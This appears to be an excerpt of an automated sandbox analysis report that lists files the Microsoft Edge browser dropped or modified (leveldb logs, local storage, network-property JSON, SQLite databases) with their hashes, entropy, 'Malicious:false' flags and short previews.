                                                                                                                                                                                                                                                        SSDEEP:12:nRyv4Yeb8rcHEZrELFUt8kGX/+kGjR5LYeb8rcHEZrEZSJ:n+4Yeb8nZrExg8kG3GXLYeb8nZrEZe
                                                                                                                                                                                                                                                        MD5:0BA888DD8691B08ACEB852623793C0E6
                                                                                                                                                                                                                                                        SHA1:7A607BA1AF7588C5A1D480A7C7A31FF2F5616800
                                                                                                                                                                                                                                                        SHA-256:4E3596C6C8CE62FCC5FB10059E4283052531CDBA40E71EBE611C7FA9735A43AF
                                                                                                                                                                                                                                                        SHA-512:81CF85BADDB983ECE0BE80210C8305FFFC06E6C2B6E93CE0CC45DFC1524702B24C9ECF8A66F3749DA761244EAB1B01096911F5477E8F6ECF021ECCB11F626C68
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:31.076 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/20-18:49:31.077 1de4 Recovering log #3.2024/11/20-18:49:31.077 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:Dyalog APL version -58.-88
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1472
                                                                                                                                                                                                                                                        Entropy (8bit):5.678885429060173
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:0ZW9R1lERD/uY+oxvRY0XZGRnWRV03y1x4PmMypWePUlHGtkTN5zgFHHmi28/V:0ZG5Et/Rj+0XZGMRV03Sx4PlypNPlW+n
                                                                                                                                                                                                                                                        MD5:6D3D27F210C013A1CB78965033CBDD2D
                                                                                                                                                                                                                                                        SHA1:55FC91DABA6DE370AF29F272E6BAE0AE82617BB0
                                                                                                                                                                                                                                                        SHA-256:800E9034CB93588C472DE42C5B91F4A70762C51CC119571F1BB66B69C9EE8DF2
                                                                                                                                                                                                                                                        SHA-512:404CF0ECCC0EFDB90A1F459697887A8882C86229392E0A42F80CE276DFDFE9078059ABBC05DD44E1639DB1715FDE304329B2676CB87F8CEBA4F75C8468F990EF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:....................VERSION.1..META:https://ntp.msn.com............!_https://ntp.msn.com..LastKnownPV..1732146581354.-_https://ntp.msn.com..LastVisuallyReadyMarker..1732146582488.._https://ntp.msn.com..MUID!.02AF36CE75CE647F00F523F374AC6592.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1732146581435,"schedule":[-1,-1,-1,-1,18,9,33],"scheduleFixed":[-1,-1,-1,-1,18,9,33],"simpleSchedule":[44,49,34,50,16,33,9]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1732146581314.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241119.367"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Wed Nov 20 2024 18:49:40 GMT-0500 (Eastern Standard
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                                                                        Entropy (8bit):5.168991442636724
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHwq2P923oH+Tcwt8a2jMGIFUt8YHYF4ZZmw+YHcFo7kwO923oH+Tcwt8a2jMmLJ:nwv4Yeb8EFUt8kYeZ/+kce75LYeb8bJ
                                                                                                                                                                                                                                                        MD5:A3592689AC000BF3B0178784F53AA97E
                                                                                                                                                                                                                                                        SHA1:499F197A876A5B9DEDB464986E083ED1CFB4B39A
                                                                                                                                                                                                                                                        SHA-256:9D318F1FADAE71B2A227307F953039EEEC3518A1B662DA2B7386B733A2DAF6E1
                                                                                                                                                                                                                                                        SHA-512:62086346E4002F4D79E87184CB4BA7C410FD81396ADF4F1FF8474AE8B04ED456405B982ED9A493ECCB4F999DE347C9AA08AA7013EE0C845AC6F0BB3670E34141
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.609 1970 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/20-18:49:27.610 1970 Recovering log #3.2024/11/20-18:49:27.614 1970 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                                                                        Entropy (8bit):5.168991442636724
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHwq2P923oH+Tcwt8a2jMGIFUt8YHYF4ZZmw+YHcFo7kwO923oH+Tcwt8a2jMmLJ:nwv4Yeb8EFUt8kYeZ/+kce75LYeb8bJ
                                                                                                                                                                                                                                                        MD5:A3592689AC000BF3B0178784F53AA97E
                                                                                                                                                                                                                                                        SHA1:499F197A876A5B9DEDB464986E083ED1CFB4B39A
                                                                                                                                                                                                                                                        SHA-256:9D318F1FADAE71B2A227307F953039EEEC3518A1B662DA2B7386B733A2DAF6E1
                                                                                                                                                                                                                                                        SHA-512:62086346E4002F4D79E87184CB4BA7C410FD81396ADF4F1FF8474AE8B04ED456405B982ED9A493ECCB4F999DE347C9AA08AA7013EE0C845AC6F0BB3670E34141
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.609 1970 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/20-18:49:27.610 1970 Recovering log #3.2024/11/20-18:49:27.614 1970 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):1664
                                                                                                                                                                                                                                                        Entropy (8bit):5.323907504653089
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:YcgCzsAtsrfc7RsSleeBkEs1CgHN8bx9+:Fjs2dkeBkRTWV9+
                                                                                                                                                                                                                                                        MD5:6B80CDCE4B4F2D61591E85142F022FC8
                                                                                                                                                                                                                                                        SHA1:602B35A7849F0258A2BC08B41A4D6F4F447575F6
                                                                                                                                                                                                                                                        SHA-256:6B1C7044A033F6A22F3FCA4DBFB9F61043DBB4C3C6E2F7A4AAE59D83EE69707B
                                                                                                                                                                                                                                                        SHA-512:9F4592DC1D79FDADA45C8410D4B610FDD06760AC605B20DF43F9EF4E08B27A1A543312382B52926A8459ED3A0F3A6345714BEF7A0DC7E48C54F16E83D9DE69BC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379212170963776","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379212175127701","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376713796146802","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                        Entropy (8bit):2.7748375058855967
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:tTXdrsZ0A65XdD7NPZzl3z3zhlpuXcf0L/ZJVb:VX93AAX57NJBEXI0LhJVb
                                                                                                                                                                                                                                                        MD5:31D009BFD5996F97ACDAB2A395CCC9A5
                                                                                                                                                                                                                                                        SHA1:87739F054F7CFA6A11452CDFA196CD864D728A1F
                                                                                                                                                                                                                                                        SHA-256:5532744E18CAF95AD693FA36E3760022BCE2E3EE5CB396951D9849392C69FD09
                                                                                                                                                                                                                                                        SHA-512:B8A5DFB63AC752464D525D79EEFFF07476D7E52A4D15430AB4004C5B17180F85C0B916F286E7DCB04944DA45BF2F849E1F3E4886FE0BC7D7B8A85F1059CADD2F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1419
                                                                                                                                                                                                                                                        Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                        MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                        SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                        SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                        SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1419
                                                                                                                                                                                                                                                        Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                        MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                        SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                        SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                        SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                        Entropy (8bit):1.1121879114925728
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9WD:uIEumQv8m1ccnvS67ZbwWis2
                                                                                                                                                                                                                                                        MD5:37D6ADF2F610A1CD693710AABECC370E
                                                                                                                                                                                                                                                        SHA1:9E551D823C6026DAF32610FC7E1541B923A79E47
                                                                                                                                                                                                                                                        SHA-256:F12BD73A7EF67D17B4501659662CEC3F1D770D61E809ED51357F8544D10F40C5
                                                                                                                                                                                                                                                        SHA-512:33EA11FBF3D0C65E5B11702A4FEFC58915ABEDD98D4F10933426FAC7214D3314BD638985822329D7C6220BC2E825D5126685A54023940C0D6C6CDDCDDB3C4940
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1419
                                                                                                                                                                                                                                                        Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                        MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                        SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                        SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                        SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                        Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                        MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                        SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                        SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                        SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9712
                                                                                                                                                                                                                                                        Entropy (8bit):5.111931167584568
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:st1kdp6s0NsZihUkqE48+bV+FWYQA66WiaFIMYsPGYJ:st1Q6s0NfhmbGxQx6WiaTYS
                                                                                                                                                                                                                                                        MD5:4646C4DFEE1D3900D73E85DB90E066D1
                                                                                                                                                                                                                                                        SHA1:F12A640BFEB84DF4B66E2A378A17C7C68817EFED
                                                                                                                                                                                                                                                        SHA-256:1024A11600EFF96EC1C477A00E6CC285F6DF616D79A4A9E4F788C33A7AB54E90
                                                                                                                                                                                                                                                        SHA-512:3E1D78906F7B7F7654A35E8C09CAEB440EAD8228934C5C8A49D1F41C32B92F2DC29CCF5C2A0EE1A1569C82342B186296B362E2E9C68A83DD1EAD05EE9138397D
                                                                                                                                                                                                                                                        Malicious:false
